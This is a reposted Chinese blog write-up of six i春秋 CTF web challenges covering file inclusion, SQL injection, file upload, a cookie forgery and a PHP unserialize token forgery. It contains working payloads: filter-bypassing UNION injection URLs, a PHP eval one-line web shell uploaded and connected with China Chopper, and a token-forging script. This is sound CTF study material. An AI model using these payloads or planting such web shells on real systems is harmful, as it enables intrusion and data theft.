本文主要是介绍I春秋CTF训练营web题解(一),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
I春秋CTF训练营web题解(一)
(1)include
==hint:没错!就是文件包含漏洞.==
点开链接,发现
通过源码可知可以提交一个path的变量,通过ctrl+f搜索allow_url_include,发现是打开状态:
所以打开火狐浏览器,用hackbar工具输入:
发现存在疑似含有flag的文件
接着使用php://filter协议查看曝露出来的文件的内容,因为PHP文件是在不能直接显示的,所以使用了base64编码显示
然后解码就可以得到flag了
(2)SQL
==hint:出题人就告诉你这个是个注入,有种别走!==
创建链接点进去,然后查看源码
很明显知道用sql注入,用火狐hackbar进行手动注入,先爆字段
http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 order by 4
说明存在过滤,试试/**/,关键词大写,不行,然后尝试<>发现可以
http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 ord<>er by 4
没出现结果,所以接下来继续爆字段,4不对就二分法换2,然后发现还是没结果,换3有了
http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 ord<>er by 2
http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 ord<>er by 3
然后输入
http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 union se<>lect 1,2,3 from info
说明第二个字段可以显示,那么接下来就是爆数据库名,表名,列名:
①爆数据库名
http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 union se<>lect 1,database(),3 from info
②爆表名
http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 union se<>lect 1,table_name,3 from information_schema.tables where table_schema='sqli'
③爆列名
http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 union se<>lect 1,column_name,3 from information_schema.columns where table_name='sqli'
发现疑似存在flag的列
http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 union se<>lect 1,flAg_T5ZNdrm,3 from sqli.info
flag就出来了。
(3)Do you know upload
==hint:加油吧,少年。==
创建链接,点开
很明显文件上传,试着上传已经写好的PHP一句话木马
<?php eval($_POST['a']);?>
然后改为jpg格式上传抓包,并改为php后缀就可以成功上传。
因为我之前已经成功上传过了1.php文件,显示已存在,如果是第一次上传就会显示路径:upload/1.php
然后就是菜刀连接,打开
发现config.php和ctf.sql,flag应该存在数据库中,点开config.php可以看到数据库的信息
然后用菜刀编写shell连接到数据库查看flag。
(4)broken
==hint:you got a file,but…==
点开链接,发现file是个超链接,点进去
一看jother编码,放进浏览器控制台,发现末尾少了一个],加上后出现错误
于是删除最后面的(),再次输入得到[Array(1)],打开就可以看到flag了。
(5)who are you?
==hint:我是谁,我在哪,我要做什么?==
点开链接进去,显示
然后抓包发现cookie参数有问题
猜测是base64编码,拿去解码得
是Rot13,运行脚本解码得到guest,尝试将guest换成admin用脚本进行Rot13加密得到Zjo1OiJucXp2YSI7,再重新放入cookie中
可以看到已经成功登陆并且说可以上传,旁边有一条注释
<!-- $filename = $_POST['filename']; $data = $_POST['data']; -->
所以将请求包改成POST形式,然后输入
filename=2.php&data[]=<?php eval($_POST['a']);?>
再次提交
找到路径,输入进去看看就可以得到flag。
(6)Login
==hint:加油,我看好你==
点开链接,是一个登录界面
做web题习惯性的点开页面源代码看,发现一行注释,虽然在页面下面
猜测是账号密码,输入登录发现成功登录,然而登录了并没有什么东西,抓包看看
发现member.php这页刷新返回包中有一个show参数,猜测可以show source,所以改包,加上一个show参数并设为1
发现真的出现了源码
if(isset($requset['token'])){$login = unserialize(gzuncompress(base64_decode($requset['token'])));$db = new db();$row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');if($login['user'] === 'ichunqiu'){echo $flag;}else if($row['pass'] !== $login['pass']){echo 'unserialize injection!!';}else{echo "(╯‵□′)╯︵┴─┴ ";}
重要的就是这段,编写代码
<?php
$a=array('user'=>'ichunqiu');
$a=base64_encode(gzcompress(serialize($a)));
echo $a
?>
运行得到token
然后放到cookie中提交就可以得到flag。
这篇关于I春秋CTF训练营web题解(一)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!